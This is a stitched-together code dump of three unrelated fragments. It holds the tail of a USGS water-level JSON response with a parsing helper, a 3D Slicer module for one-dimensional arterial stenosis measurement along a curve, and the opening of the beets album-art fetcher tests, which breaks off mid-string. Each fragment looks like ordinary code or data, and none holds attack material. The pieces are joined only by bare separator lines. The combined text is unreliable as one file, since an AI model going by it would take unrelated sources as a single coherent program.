'dateTime': '2020-04-18T01:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:17:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:22:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:24:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:30:00.000-07:00'},
{'value': '2.1',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:34:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:36:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:39:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:41:00.000-07:00'},
{'value': '2.0',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:44:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:01:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:20:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:22:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:24:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:30:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:34:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:37:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:39:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:41:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:44:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:21:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:24:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:35:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:17:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:25:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:27:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:32:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:10:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:12:00.000-07:00'},
{'value': '1.9',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:25:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:27:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:29:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:03:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:34:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:06:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:19:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:22:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:24:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:35:00.000-07:00'}],
'qualifier': [{'qualifierCode': 'P',
'qualifierDescription': 'Provisional data subject to revision.',
'qualifierID': 0,
'network': 'NWIS',
'vocabulary': 'uv_rmk_cd'}],
'qualityControlLevel': [],
'method': [{'methodDescription': 'Variable Depth Profile Data',
'methodID': 254060}],
'source': [],
'offset': [],
'sample': [],
'censorCode': []}],
'name': 'USGS:444306122144600:63680:00000'}]},
'nil': False,
'globalScope': True,
'typeSubstituted': False
}
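# A minimal sketch (not part of the fixture above; names are assumed) of how
# a USGS NWIS instantaneous-values response shaped like this dict can be
# flattened. `response` is assumed to be the variable the dict is bound to.
def iter_readings(response):
    """Yield (dateTime, float value) for every data point in the response."""
    for series in response['value']['timeSeries']:
        for block in series['values']:
            for point in block['value']:
                yield point['dateTime'], float(point['value'])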
|
|
import os
import unittest
import logging
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
from slicer.util import VTKObservationMixin
#
# StenosisMeasurement1D
#
class StenosisMeasurement1D(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Stenosis measurement : 1D"
self.parent.categories = ["Vascular Modeling Toolkit"]
self.parent.dependencies = []
self.parent.contributors = ["SET [Surgeon] [Hobbyist developer]", "Andras Lasso, PerkLab"]
self.parent.helpText = """
This <a href="https://github.com/vmtk/SlicerExtension-VMTK/">module</a> straightens an open input markups curve and displays cumulative and individual lengths between control points. It is intended for quick one-dimensional arterial stenosis evaluation, but is purpose-agnostic in practice.
"""
# TODO: replace with organization, grant and thanks
self.parent.acknowledgementText = """
This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc., Andras Lasso, PerkLab,
and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.
"""
#
# StenosisMeasurement1DWidget
#
class StenosisMeasurement1DWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent=None):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.__init__(self, parent)
VTKObservationMixin.__init__(self) # needed for parameter node observation
self.logic = None
self._parameterNode = None
self._updatingGUIFromParameterNode = False
def setup(self):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.setup(self)
# Load widget from .ui file (created by Qt Designer).
# Additional widgets can be instantiated manually and added to self.layout.
uiWidget = slicer.util.loadUI(self.resourcePath('UI/StenosisMeasurement1D.ui'))
self.layout.addWidget(uiWidget)
self.ui = slicer.util.childWidgetVariables(uiWidget)
# Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's
# "mrmlSceneChanged(vtkMRMLScene*)" signal is connected to each MRML widget's
# "setMRMLScene(vtkMRMLScene*)" slot.
uiWidget.setMRMLScene(slicer.mrmlScene)
# Create logic class. Logic implements all computations that should be possible to run
# in batch mode, without a graphical user interface.
self.logic = StenosisMeasurement1DLogic()
# Connections
# These connections ensure that we update parameter node when scene is closed
self.addObserver(slicer.mrmlScene, slicer.mrmlScene.StartCloseEvent, self.onSceneStartClose)
self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.onSceneEndClose)
# Make sure parameter node is initialized (needed for module reload)
self.initializeParameterNode()
# These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene
# (in the selected parameter node).
self.ui.inputMarkupsSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
# Application connections
self.ui.inputMarkupsSelector.connect("currentNodeChanged(vtkMRMLNode*)", lambda node: self.setInputCurve(node))
# Update logic from parameter node
self.logic.setInputCurve(self._parameterNode.GetNodeReference("InputCurve"))
# Fill the table through a callback from logic.
self.logic.widgetCallback = self.populateTable
def cleanup(self):
"""
Called when the application closes and the module widget is destroyed.
"""
self.removeObservers()
def enter(self):
"""
Called each time the user opens this module.
"""
# Make sure the parameter node exists and is observed
self.initializeParameterNode()
def exit(self):
"""
Called each time the user opens a different module.
"""
# Do not react to parameter node changes (GUI will be updated when the user enters the module)
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
def onSceneStartClose(self, caller, event):
"""
Called just before the scene is closed.
"""
# Parameter node will be reset, do not use it anymore
self.setParameterNode(None)
def onSceneEndClose(self, caller, event):
"""
Called just after the scene is closed.
"""
# If this module is shown while the scene is closed then recreate a new parameter node immediately
if self.parent.isEntered:
self.initializeParameterNode()
self.logic.InitMemberVariables()
def initializeParameterNode(self):
"""
Ensure the parameter node exists and is observed.
"""
# Parameter node stores all user choices in parameter values, node selections, etc.
# so that when the scene is saved and reloaded, these settings are restored.
self.setParameterNode(self.logic.getParameterNode())
def setParameterNode(self, inputParameterNode):
"""
Set and observe parameter node.
Observation is needed because when the parameter node is changed then the GUI must be updated immediately.
"""
if inputParameterNode:
self.logic.setDefaultParameters(inputParameterNode)
# Unobserve previously selected parameter node and add an observer to the newly selected.
# Changes of parameter node are observed so that whenever parameters are changed by a script or any other module
# those are reflected immediately in the GUI.
if self._parameterNode is not None:
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
self._parameterNode = inputParameterNode
if self._parameterNode is not None:
self.addObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
# Initial GUI update
self.updateGUIFromParameterNode()
def updateGUIFromParameterNode(self, caller=None, event=None):
"""
This method is called whenever parameter node is changed.
The module GUI is updated to show the current state of the parameter node.
"""
if self._parameterNode is None or self._updatingGUIFromParameterNode:
return
# Make sure GUI changes do not call updateParameterNodeFromGUI (it could cause infinite loop)
self._updatingGUIFromParameterNode = True
# Update node selectors and sliders
self.ui.inputMarkupsSelector.setCurrentNode(self._parameterNode.GetNodeReference("InputCurve"))
# All the GUI updates are done
self._updatingGUIFromParameterNode = False
def updateParameterNodeFromGUI(self, caller=None, event=None):
"""
This method is called when the user makes any change in the GUI.
The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).
"""
if self._parameterNode is None or self._updatingGUIFromParameterNode:
return
wasModified = self._parameterNode.StartModify() # Modify all properties in a single batch
self._parameterNode.SetNodeReferenceID("InputCurve", self.ui.inputMarkupsSelector.currentNodeID)
self._parameterNode.EndModify(wasModified)
def setInputCurve(self, curveNode):
self.logic.setInputCurve(curveNode)
self.populateTable()
self.logic.widgetCallback = self.populateTable
def populateTable(self):
inputCurve = self.ui.inputMarkupsSelector.currentNode()
outputTable = self.ui.outputTableWidget
# Clean table completely.
outputTable.clear()
outputTable.setRowCount(0)
outputTable.setColumnCount(0)
if not inputCurve:
return
numberOfControlPoints = inputCurve.GetNumberOfControlPoints()
# Setup table.
if outputTable.columnCount == 0:
outputTable.setColumnCount(4)
outputTable.setRowCount(numberOfControlPoints - 1)
columnLabels = ("Cumulative", "Cumulative %", "Partial", "Partial %")
outputTable.setHorizontalHeaderLabels(columnLabels)
# Get global variables.
curveTotalLength = inputCurve.GetCurveLengthWorld()
curveControlPoints = vtk.vtkPoints()
inputCurve.GetControlPointPositionsWorld(curveControlPoints)
partDistance = 0.0
measurementLength = inputCurve.GetMeasurement("length")
measurementLengthUnit = measurementLength.GetUnits()
"""
Iterate over control points.
Start at index 1, we measure backwards.
"""
for pointIndex in range(1, numberOfControlPoints):
curvePoint = curveControlPoints.GetPoint(pointIndex)
controlPointIndex = inputCurve.GetClosestCurvePointIndexToPositionWorld(curvePoint)
# Distance of control point from start.
cumulativeDistance = inputCurve.GetCurveLengthBetweenStartEndPointsWorld(
0, controlPointIndex)
item = qt.QTableWidgetItem()
content = f"{cumulativeDistance:.1f} {measurementLengthUnit}"
item.setText(content)
outputTable.setItem(pointIndex - 1, 0, item)
# Proportional cumulative distance, with respect to total length.
item = qt.QTableWidgetItem()
content = f"{(cumulativeDistance / curveTotalLength) * 100:.1f} %"
item.setText(content)
outputTable.setItem(pointIndex - 1, 1, item)
# Distance between two adjacent points.
previousCurvePoint = curveControlPoints.GetPoint(pointIndex - 1)
previousControlPointIndex = inputCurve.GetClosestCurvePointIndexToPositionWorld(previousCurvePoint)
partDistance = inputCurve.GetCurveLengthBetweenStartEndPointsWorld(
previousControlPointIndex, controlPointIndex)
item = qt.QTableWidgetItem()
content = f"{partDistance:.1f} {measurementLengthUnit}"
item.setText(content)
outputTable.setItem(pointIndex - 1, 2, item)
# Proportional distance between two adjacent points, with respect to total length.
item = qt.QTableWidgetItem()
content = f"{(partDistance / curveTotalLength) * 100:.1f} %"
item.setText(content)
outputTable.setItem(pointIndex - 1, 3, item)
#
# StenosisMeasurement1DLogic
#
class StenosisMeasurement1DLogic(ScriptedLoadableModuleLogic):
def __init__(self):
"""
Called when the logic class is instantiated. Can be used for initializing member variables.
"""
ScriptedLoadableModuleLogic.__init__(self)
self.InitMemberVariables()
def InitMemberVariables(self):
self.inputCurve = None
self.observations = []
self.widgetCallback = None
def setDefaultParameters(self, parameterNode):
"""
Initialize parameter node with default settings.
"""
pass
def setInputCurve(self, curveNode):
# Remove all observations on current curve
if self.inputCurve:
for observation in self.observations:
self.inputCurve.RemoveObserver(observation)
self.observations.clear()
self.inputCurve = curveNode
# React when points are moved, removed or added.
if self.inputCurve:
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointEndInteractionEvent, self.onCurveControlPointEvent))
# Don't use PointAddedEvent. It is fired on mouse move in views.
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointPositionDefinedEvent, self.onCurveControlPointEvent))
self.observations.append(self.inputCurve.AddObserver(slicer.vtkMRMLMarkupsNode.PointRemovedEvent, self.onCurveControlPointEvent))
self.process()
else:
msg = "No curve."
slicer.util.showStatusMessage(msg, 4000)
slicer.app.processEvents()
logging.info(msg)
# Signal widget to clear the table.
if self.widgetCallback:
self.widgetCallback()
def onCurveControlPointEvent(self, caller, event):
self.process()
def process(self):
if not self.inputCurve:
msg = "No curve."
slicer.util.showStatusMessage(msg, 4000)
slicer.app.processEvents()
logging.info(msg)
return
# Nothing to straighten if there are only 2 control points: that is already a line.
if (self.inputCurve.GetNumberOfControlPoints() == 2):
# Just signal widget to fill the table with results.
if self.widgetCallback:
self.widgetCallback()
return
# Generate a linear polydata from first and last control point.
numberOfControlPoints = self.inputCurve.GetNumberOfControlPoints()
lineSource = vtk.vtkLineSource()
curveControlPoints = vtk.vtkPoints()
self.inputCurve.GetControlPointPositionsWorld(curveControlPoints)
firstControlPointPosition = curveControlPoints.GetPoint(0)
lastControlPointPosition = curveControlPoints.GetPoint(numberOfControlPoints - 1)
lineSource.SetPoint1(firstControlPointPosition)
lineSource.SetPoint2(lastControlPointPosition)
lineSource.Update()
linePolyData = lineSource.GetOutput()
# The polydata contains 2 points. Generate more points.
polydataSampler = vtk.vtkPolyDataPointSampler()
polydataSampler.SetInputData(linePolyData)
polydataSampler.Update()
# This is the reference line polydata.
straightLinePolyData = polydataSampler.GetOutput()
startPoint = curveControlPoints.GetPoint(0)
cumulativeDistanceArray = [[0.0, startPoint]]
# Iterate over all curve points, ignoring first and last.
for pointIndex in range(1, numberOfControlPoints - 1):
point = curveControlPoints.GetPoint(pointIndex)
closestIdOnStraightLine = straightLinePolyData.FindPoint(point)
closestPointOnStraightLine = straightLinePolyData.GetPoint(closestIdOnStraightLine)
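# Note: Distance2BetweenPoints returns the *squared* distance. That is
# fine here because squaring is monotonic for non-negative distances,
# so the sort below still orders the points correctly.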
cumulativeDistanceOfClosestPoint = vtk.vtkMath.Distance2BetweenPoints(
startPoint, closestPointOnStraightLine)
cumulativeDistanceArray.append([cumulativeDistanceOfClosestPoint,
closestPointOnStraightLine])
"""
Move each control point to the closest point on the virtual line.
If we have n control points ABCD..., C can be pushed between A and B
on the virtual line. The curve would still be valid, but the points
would be in zig-zag order, making the distances smaller than expected
or meaningless. Sort the points by distance from start to avoid this.
"""
sortedCumulativeDistanceArray = sorted(cumulativeDistanceArray,
key=lambda distance: distance[0])
for pointIndex in range(1, numberOfControlPoints - 1):
self.inputCurve.SetNthControlPointPosition(pointIndex,
sortedCumulativeDistanceArray[pointIndex][1])
# Signal widget to fill the table with results.
if self.widgetCallback:
self.widgetCallback()
#
# StenosisMeasurement1DTest
#
class StenosisMeasurement1DTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
""" Do whatever is needed to reset the state - typically a scene clear will be enough.
"""
slicer.mrmlScene.Clear()
def runTest(self):
"""Run as few or as many tests as needed here.
"""
self.setUp()
self.test_StenosisMeasurement1D1()
def test_StenosisMeasurement1D1(self):
""" Ideally you should have several levels of tests. At the lowest level
tests should exercise the functionality of the logic with different inputs
(both valid and invalid). At higher levels your tests should emulate the
way the user would interact with your code and confirm that it still works
the way you intended.
One of the most important features of the tests is that it should alert other
developers when their changes will have an impact on the behavior of your
module. For example, if a developer removes a feature that you depend on,
your test should break so they know that the feature is needed.
"""
self.delayDisplay("Starting the test")
self.delayDisplay('Test passed')
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the album art fetchers."""
from __future__ import division, absolute_import, print_function
import os
import shutil
import unittest
import responses
from mock import patch
from test import _common
from test.helper import capture_log
from beetsplug import fetchart
from beets.autotag import AlbumInfo, AlbumMatch
from beets import config
from beets import library
from beets import importer
from beets import logging
from beets import util
from beets.util.artresizer import ArtResizer, WEBPROXY
import confuse
logger = logging.getLogger('beets.test_art')
class Settings():
"""Used to pass settings to the ArtSources when the plugin isn't fully
instantiated.
"""
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class UseThePlugin(_common.TestCase):
def setUp(self):
super(UseThePlugin, self).setUp()
self.plugin = fetchart.FetchArtPlugin()
class FetchImageHelper(_common.TestCase):
"""Helper mixin for mocking requests when fetching images
with remote art sources.
"""
@responses.activate
def run(self, *args, **kwargs):
super(FetchImageHelper, self).run(*args, **kwargs)
IMAGEHEADER = {'image/jpeg': b'\x00' * 6 + b'JFIF',
'image/png': b'\211PNG\r\n\032\n', }
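# Minimal magic bytes: 'JFIF' at byte offset 6 marks a JPEG, and the
# 8-byte sequence is the standard PNG signature -- just enough for
# file-type sniffing of the mocked response body.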
def mock_response(self, url, content_type='image/jpeg', file_type=None):
if file_type is None:
file_type = content_type
responses.add(responses.GET, url,
content_type=content_type,
# imghdr reads 32 bytes
body=self.IMAGEHEADER.get(
file_type, b'').ljust(32, b'\x00'))
class CAAHelper():
"""Helper mixin for mocking requests to the Cover Art Archive."""
MBID_RELEASE = 'rid'
MBID_GROUP = 'rgid'
RELEASE_URL = 'coverartarchive.org/release/{0}' \
.format(MBID_RELEASE)
GROUP_URL = 'coverartarchive.org/release-group/{0}' \
.format(MBID_GROUP)
if util.SNI_SUPPORTED:
RELEASE_URL = "https://" + RELEASE_URL
GROUP_URL = "https://" + GROUP_URL
else:
RELEASE_URL = "http://" + RELEASE_URL
GROUP_URL = "http://" + GROUP_URL
RESPONSE_RELEASE = """{
"images": [
{
"approved": false,
"back": false,
"comment": "GIF",
"edit": 12345,
"front": true,
"id": 12345,
"image": "http://coverartarchive.org/release/rid/12345.gif",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rid/12345-1200.jpg",
